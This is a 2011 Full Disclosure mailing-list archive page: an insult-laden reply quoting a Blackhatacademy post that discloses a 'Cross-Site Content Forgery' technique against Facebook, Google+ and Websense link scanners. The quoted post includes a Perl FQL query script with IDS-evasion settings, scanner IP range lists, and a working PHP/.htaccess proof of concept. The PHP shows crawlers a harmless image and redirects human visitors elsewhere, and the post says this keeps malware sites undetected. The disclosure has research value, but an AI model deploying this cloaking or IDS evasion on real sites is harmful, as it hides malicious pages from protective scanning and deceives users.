Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Facebook/google+ Cross-Site Content Forgery exploit

From: Laurelai <laurelai () oneechan org>
Date: Sun, 09 Oct 2011 08:52:46 -0700
On 10/8/2011 8:45 PM, Antony widmal wrote:

Shit man, that's serious business....















(S-K trying to take over FD)
Of course it's not your code dickwad. All ya know is talking & posting shit on an IT Sec mailing list.
On Sat, Oct 8, 2011 at 7:53 PM, Laurelai <laurelai () oneechan org <mailto:laurelai () oneechan org>> wrote: 

    Blackhatacademy has asked me to post this to the mailing list as
    im one of the instructors there, I did not personally develop the
    exploit, please direct questions regarding it to hatter on
    irc.blackhatacademy.org <http://irc.blackhatacademy.org>


      Overview


    Over the years, facebook has been vulnerable to numerous web
    exploitation
    <http://www.blackhatacademy.org/security101/index.php?title=Web_Exploitation>
    techniques, such as XSS
    <http://www.blackhatacademy.org/security101/index.php?title=XSS>,
    FQL injection (similar to SQL injection
    <http://www.blackhatacademy.org/security101/index.php?title=SQL_injection>),
    application worms, and redirect protection bypass. Because they
    continue to attempt to write their own language implementations,
    they are repeatedly vulnerable. Security by obscurity doesn't work
    if they document their own markup language
    <http://developers.facebook.com/docs/reference/fbml/> and query
    language <http://developers.facebook.com/docs/reference/fql/> for
    attackers.


      History

    XSS
    <http://www.blackhatacademy.org/security101/index.php?title=XSS>
    in facebook first started out as a flaw in their fbml
    <http://developers.facebook.com/docs/reference/fbml/> markup and
    subsequently became evident in a variety of facebook applications.
    Applications
    <http://www.blackhatacademy.org/security101/index.php?title=Applications>
    also exposed users to third party attacks that could affect a
    user's web browser or force actions as the affected user. Now
    there is a way to bypass content restrictions on links and posts
    put on a user's public wall. Facebook was notified of these
    vulnerabilities
    <http://www.blackhatacademy.org/security101/index.php?title=Vulnerability>
    on July 31st, 2011. To date (October 4, 2011) Facebook has yet to
    do anything about this; demonstrating a deplorable lack of
    reasonable care for all of their users. For this reason, the
    vulnerability
    <http://www.blackhatacademy.org/security101/index.php?title=Vulnerability>
    proof of concept code is being brought to light. Facebook has only
    recently purchased websense to attempt to push this vulnerability
    under the rug, however the exploit still works.


      FQL

    Simply requiring an API key for privileged queries does not
    protect facebook from people arbitrarily obtaining one. Facebook
    was even so kind as to give a reference of tables and columns in
    the documentation for FQL. To access Facebook's FQL API, it takes
    only a well-formed HTTP request with an embedded API key to return
    a valid XML object. FQL Does not allow the use of JOINS, however
    it is not needed as everything is thoroughly documented. Attackers
    can misuse this during the creation of a malicious facebook
    application or directly on the FQL development api page for
    information gathering. The implementation below uses LibWhisker2
    for IDS evasion via session splicing.

    #!/usr/bin/perl
    use  warnings;
    use  XML::Simple;
    use  LW2;
    use  Getopt::Std;
    my  %opts;
    getopts('q:',\%opts);
    my  $query  =  $opts{q}  if  defined  $opts{q};
    $query  =  "SELECT pic_big FROM user WHERE uid=6666666"  unless  defined  $opts{q};
    my  $ref  =  fqlQuery($query);
    foreach  my  $parent  (sort  keys  %{$ref})  {
         if  (%{$ref->{$parent}})  {
             print  "$parent:\n";
             foreach  my  $key  (sort  keys  %{$ref->{$parent}})  {
                 if  (%{$ref->{$parent}->{$key}})  {
                print  "\t$key :\n";
                    foreach  my  $mojo  (sort  keys  %{$ref->{$parent}->{$key}})  {
                        print  "\t\t$mojo : ";
                        print  $ref->{$parent}->{$key}->{$mojo};
                print  "\n";
                }
                 }  else  {    print  "\t$key : ";
                    print  $ref->{$parent}->{$key};
                    print  "\n";
                 }
             }
         }  else  {
             print  "$parent :"  .  $ref->{$parent}  .  "\n";
         }
    }
    sub  fqlQuery{
         my  $q  =  shift;
         $q  =~  s/ /%20/g;
         my  $link  =  "http://api.facebook.com/method/fql.query?query=$q";  
<http://api.facebook.com/method/fql.query?query=$q>;
         my  $text  =  download($link,"api.facebook.com  <http://api.facebook.com>");
         my  $ref   =  XMLin($text);
         return($ref);
    }
    sub  download
    {
         my  $uri  =  shift;
         my  $try  =  5;
         my  $host  =  shift;
         my  %request;
         my  %response;
         LW2::http_init_request(\%request);
         $request{'whisker'}->{'method'}  =  "GET";
         $request{'whisker'}->{'host'}  =  $host;
         $request{'whisker'}->{'uri'}  =  $uri;
         $request{'whisker'}->{'encode_anti_ids'}  =  9;
         $request{'whisker'}->{'user-agent'}  =  "";
         LW2::http_fixup_request(\%request);
         if(LW2::http_do_request(\%request,  \%response))  {
             if($try  <  5)  {
                 print  "Failed to fetch $uri on try $try. Retrying...\n";
                 return  undef  if(!download($uri,  $try++));
             }
             print  "Failed to fetch $uri.\n";
             return  undef;
         }  else  {
             return  ($response{'whisker'}->{'data'},  $response{'whisker'}->{'data'});
         }
    }


      Content Forgery

    While most major sites that allow link submission are vulnerable
    to this method, sites including websense, google+, and facebook
    make the requests easily identifiable. These sites send an initial
    request to the link in order to store a mirror thumbnail of the
    image, or a snapshot of the website being linked to. In doing so,
    many use a custom user agent, or have IP addresses
    <http://www.blackhatacademy.org/security101/index.php?title=IP_address>
    that resolve to a consistant domain name. Facebook IP addresses
    <http://www.blackhatacademy.org/security101/index.php?title=IP_address>
    resolve to tfbnw.net <http://tfbnw.net>, also set a custom user
    agent of "facebookexternalhit". Google+ (Also notified Jul. 31st
    and guilty of reasonable care) again follows suit and utilizes
    "Feedfetcher-Google" as their user agent. Knowing this, we can
    easily filter out requests coming from these websites, and offer
    up a legitimate image to be displayed on their site, while
    redirecting or displaying a completely different page to anyone
    that follows the links. Facebook's recent partnership with
    websense is laughable, due to websense's "ACE" security scanner
    that is just as easily identified, by using gethostbyaddr in order
    to resolve the IP back to websense.com <http://websense.com>.
    Utilizing this technique, would allow an overwhelming number of
    malware sites to remain undetected to their automatic site
    analysis. Other places like digg.com <http://digg.com> either
    spoof a user agent to look like normal traffic, or forward the
    client's user agent, which makes it more difficult to catch every
    one of their requests. Fortunately, digg.com <http://digg.com>
    only requests the link once, prior to submitting the link to the
    world. This allows attackers to serve up a legitimate image until
    that initial request clears our server, and then replace it with a
    less than honest file. We have affectionately named this
    vulnerability class Cross-Site Content Forgery
    <http://www.blackhatacademy.org/security101/index.php?title=XSCF>.


        Screenshots & Video

      Facebook  <http://i.imgur.com/rJf7G.jpg>  Google+  <http://i.imgur.com/GSL2s.jpg>  Youtube video of PoC for both  
<http://www.youtube.com/watch?v=w6trQc0vWH4>


        CIDR

    CIDR ranges can also be checked as well. A list of netranges is
    below, followed by an htaccess and PoC code for a jpeg file.


          Websense

    *ASN 13448*

      86.111.216.0/21  <http://86.111.216.0/21>
      204.15.64.0/21  <http://204.15.64.0/21>
      208.80.192.0/21  <http://208.80.192.0/21>
      208.87.232.0/21  <http://208.87.232.0/21>
      192.132.210.0/24  <http://192.132.210.0/24>
      206.169.148.0/24  <http://206.169.148.0/24>
      67.117.201.128/28  <http://67.117.201.128/28>
      80.69.16.112/29  <http://80.69.16.112/29>
      2605:7000::/32
      2620:0:C0::/48


          Facebook

    *ASN 32934/54115*

      173.252.64.0/18  <tel:173.252.64.0%2F18>
      69.171.224.0/19  <http://69.171.224.0/19>
      66.220.144.0/20  <http://66.220.144.0/20>
      69.63.176.0/20  <http://69.63.176.0/20>
      31.13.24.0/21  <http://31.13.24.0/21>
      74.119.76.0/22  <http://74.119.76.0/22>
      65.204.104.128/28  <http://65.204.104.128/28>
      66.92.180.48/28  <http://66.92.180.48/28>
      212.187.194.160/28  <http://212.187.194.160/28>
      212.187.196.96/28  <http://212.187.196.96/28>
      67.200.105.48/29  <http://67.200.105.48/29>
      66.93.78.176/29  <http://66.93.78.176/29>
      66.199.37.136/29  <http://66.199.37.136/29>
      2620:0:1C00::/48


        Proof of Concept

    In order to exploit this flaw, JPG images will need to have a
    custom mimetype returned. This can be accomplished via the
    following .htaccess directives:

      AddType x-httpd-php .jpg
      AddHandler application/x-httpd-php .jpg

    <?php
    # User agent checking methods
    $fb_string  =  '/facebookexternal/i';                 # facebookexternal shows in the facebook content scanner's 
user agent
    $gplus_string  =  '/Feedfetcher-Google/i';        # googleplus shows up in the user agent as well.
    # rDNS Lookup Methods
    $host_websense  =  '/websense.com/i  <http://websense.com/i>';          # Checking the rdns for websense filters
    $host_fb  =  '/tfbnw.net/i  <http://tfbnw.net/i>';                               # Checking the rdns fortfbnw.net  
<http://tfbnw.net>  - facebook host
    # Load the request properties
    $u_agent  =  $_SERVER['HTTP_USER_AGENT'];
    $u_ref      =  $_SERVER['HTTP_REFERER'];
    $u_host   =  gethostbyaddr($_SERVER['REMOTE_ADDR']);
    # If we're coming from or facebook or websense or google plus,
    if  (preg_match($host_fb,$u_host)  ||  preg_match($host_websense,$u_host)  ||  preg_match($fb_string,$u_agent)  ||  
preg_match($gplus_string,$u_agent))  {
         # Display an image
         header('Content-Type: image/jpeg');
         @readfile  ('/var/www/localhost/cute_kitten.jpeg');
    }  else  {
         # Rickroll this unsuspecting user
         header('Location:http://www.youtube.com/watch?v=dQw4w9WgXcQ&ob=av3e  
<http://www.youtube.com/watch?v=dQw4w9WgXcQ&ob=av3e>');
    }
    ?>


    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/



You sir, are an idiot.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: